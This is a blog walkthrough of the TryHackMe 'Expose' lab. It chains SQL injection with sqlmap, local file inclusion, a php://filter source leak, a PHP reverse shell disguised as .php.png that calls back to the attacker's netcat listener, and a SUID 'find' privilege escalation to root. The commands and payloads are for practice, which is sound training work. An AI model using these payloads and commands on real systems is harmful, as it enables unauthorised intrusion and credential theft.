Open in app

Sign in

Write

Sign in

TryHackMe Writeup — Expose

rckljuskat
7 min readSep 12, 2023

--

Expose is a subscriber-only room meant to test your red-teaming skills.
Room by 1337rce

Access the room here
Difficulty: Easy
Useful tools for the challenge: Nmap, sqlmap, wordlists, ffuf/gobuster, PHP shells

Enumeration phase

We are going to scan the machine using the industry-standard tool called nmap.

Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. It is built into Kali Linux by default.

We will perform the following two scans:

sudo nmap -T4 -sV MACHINE_IP

Scanning for common ports, -sV used for version enumeration, -T4 used to speed up the process, read more about flags here

sudo nmap -T4 -sV MACHINE_IP -p1000–5000

Scanning for non-standard ports above 1000

From here on, the most logical option left to us is to explore the web page and see if it has anything to offer.

It is just a blank page with title exposed

Directory fuzzing

Gobuster is a tool that enumerates hidden directories and files in the target domain by performing a brute-force attack on the URL of the target.

Let’s fuzz using Gobuster to obtain any interesting directories:

Syntax:
gobuster dir -u http://<MACHINE_IP>:<PORT> -w <wordlist>

-t specifies number of threads(speeds up the process)

After navigating to the /admin page we can see that hitting “Continue” after typing our data does nothing. The page is static and is not of our interest.

The actual admin portal is located at /admin_101 as we can see an error being returned when typing invalid data.

Exploitation phase

First, we should test if the login form is vulnerable to an SQL injection.
You can find some generic SQLi payloads here.
After testing with the payload ‘LIKE’ as username we discover a new page at /admin_101/chat.php.

Checked page source. Found nothing valuable.

Here, we will use a tool called Sqlmap in order to enumerate further and possibly dump the database. In order to do that we will grab a copy of the request and send it to a .txt file using Burp Suite.
Burp allows us to intercept traffic and capture the requests sent between our browser-client and the server.

Capturing request with Burp Proxy and saving it into req.txt

Note that you should disable the Burp proxy before proceeding with the execution of the sqlmap command as it will interfere with the process.

Sqlmap syntax:

sqlmap -r <req_file> — dump

This will dump all data retrieved from the tables of the database

Credentials for hacker@root.thm
Config table

Here we found two new pages on the config table exposed along with a password hash for one of them as well as a hint.

We can crack the hash using crackstation.

After obtaining that information we can log in using password at /file1010111/index.php and examine the page.

Here we see the following text:

Parameter Fuzzing is also important :) or Can you hide DOM elements?

We open the source of the page and we got a hint suggesting we should try “file” or “view” as GET parameters. The website is vulnerable to Local File Inclusion(LFI). That means we can access any file on the server.

http://MACHINE_IP:1337/file1010111/index.php?file=/etc/passwd

We just found the username zeamkish(username starting with Z). We can use that username to log into the page we previously found while dumping the database at /upload-cv00101011/index.php

The page gives us a way to upload a file onto the server. We should try uploading a reverse shell(PHP). However getting one step further and examining the source code of the page we can see that the utility accepts only png/jpg files.

<script>


function validate(){

 var fileInput = document.getElementById('file');
  var file = fileInput.files[0];
  
  if (file) {
    var fileName = file.name;
    var fileExtension = fileName.split('.').pop().toLowerCase();
    
    if (fileExtension === 'jpg' || fileExtension === 'png') {
      // Valid file extension, proceed with file upload
      // You can submit the form or perform further processing here
      console.log('File uploaded successfully');
   return true;
    } else {
      // Invalid file extension, display an error message or take appropriate action
      console.log('Only JPG and PNG files are allowed');
   return false;
    }
  }
}

</script>

We can grab the famous php-reverse-shell script created by PentestMonkey.
Note that you should edit the script with your IP address and listening port.
Save the file with extension .php.png to bypass the filter.

Set up a listener on our machine using Netcat:

Then we upload the file using the form and we receive the following ouput:

File uploaded successfully! Maybe look in source code to see the path

Remember the LFI we previously exploited? That’s our way into executing the script to get a shell on the server. But we need to know the path in order to access it.

http://MACHINE_IP:1337/file1010111/index.php?file=/path/to/file

We can leak the source code in /upload-cv00101011/index.php using the LFI and a PHP filter. PHP filters are commonly used to represent data in different ways. We can use them here to get back data as base64-encoded text instead of plain php code that our browser directly runs by default.

http://MACHINE_IP:1337/file1010111/index.php?file=php://filter/convert.base64-encode/resource=../upload-cv00101011/index.php

We copy the result given us to the page and place it into a txt file on our local machine. We can then decode the payload with:

base64 -d filename.txt

Leaked PHP source code:

  echo "</p>";
 }
 else{
  
    $targetDir = "upload_thm_1001/"; // Directory where uploaded files will be stored
    $targetFile = $targetDir . basename($_FILES["file"]["name"]); // Path of the uploaded file

     // Check if file is a valid upload
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile)) {
    echo '<h1>File uploaded successfully! Maybe look in source code to see the path<span style=" display: none;">in /upload_thm_1001 folder</span> <h1>';
    } else {
    echo "Error uploading file.";
    }

   exit;
 }
 }
 else{
  
 
   if ($password === '********' AND !isset($_SESSION['validate_file'])){
  $_SESSION['validate_file'] = true;


    } else {
      echo '<div class="fixed inset-0  flex items-center justify-center bg-gray-900 bg-opacity-50">';
      echo '<div class="bg-white rounded p-8 max-w-sm mx-auto">';
      echo '<form method="POST" base64: invalid input

We just discovered uploaded files are stored at /upload-cv00101011/upload_thm_1001/
Let’s activate our reverse shell.

http://MACHINE_IP:1337/file1010111/index.php?file=../upload-cv00101011/upload_thm_1001/(put your filename here)

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444          
listening on [any] 4444 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.250.78] 52826
Linux ip-10-10-250-78 5.15.0-1039-aws #44~20.04.1-Ubuntu SMP Thu Jun 22 12:21:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 12:53:18 up  3:44,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$whoami
www-data
$

Post-Exploitation

Looking around the system we can find zeamkish’s home directory where his ssh creds are stored along with the first flag.

$ cd /home/zeamkish
$ ls
flag.txt
ssh_creds.txt
$ cat ssh_creds.txt

We can establish a more stable connection now using the SSH protocol.

┌──(kali㉿kali)-[~]
└─$ ssh zeamkish@10.10.250.78
zeamkish@10.10.250.78's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-1039-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Sep 12 13:00:00 UTC 2023

  System load:  0.07              Processes:             126
  Usage of /:   7.1% of 58.09GB   Users logged in:       0
  Memory usage: 17%               IPv4 address for eth0: 10.10.250.78
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep 12 12:59:52 2023 from 10.18.16.71
zeamkish@ip-10-10-250-78:~$

We can now read the first flag in the same directory.

To further escalate our privileges we will enumerate the machine for any vulnerable SUIDs. The SUID (Set User ID) bit is a permission in Unix-like operating systems that allows a program to run with the permissions of the file’s owner rather than the user who executed it. This means we can elevate our privileges if a binary that’s owned by root is misconfigured.

Search for SUIDs:

$ find / -perm -4000 2>/dev/null

2>/dev/null redirection is a good practice to filter any errors in the ouput. Means “send all errors to the mysterious /dev/null”.

The binary /usr/bin/find stands out as non-standard one in our list.

Gtfobins is an excellent place to look for when exploiting system binaries.
Binary find exploit here

zeamkish@ip-10-10-250-78:~$ find . -exec /bin/sh -p \; -quit
# whoami
root
# cd /root
# cat root.txt

We finally got a root shell and read the final flag.

Thanks for reading the writeup!

Never forget to feed the penguins :)
Tryhackme Writeup
Tryhackme
Ctf Writeup
Web Exploitation
Privilege Escalation

--

--

rckljuskat

Written by rckljuskat

0 Followers

Linux Enjoyer, CyberSecurity Enthusiast, Pentester wannabe

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams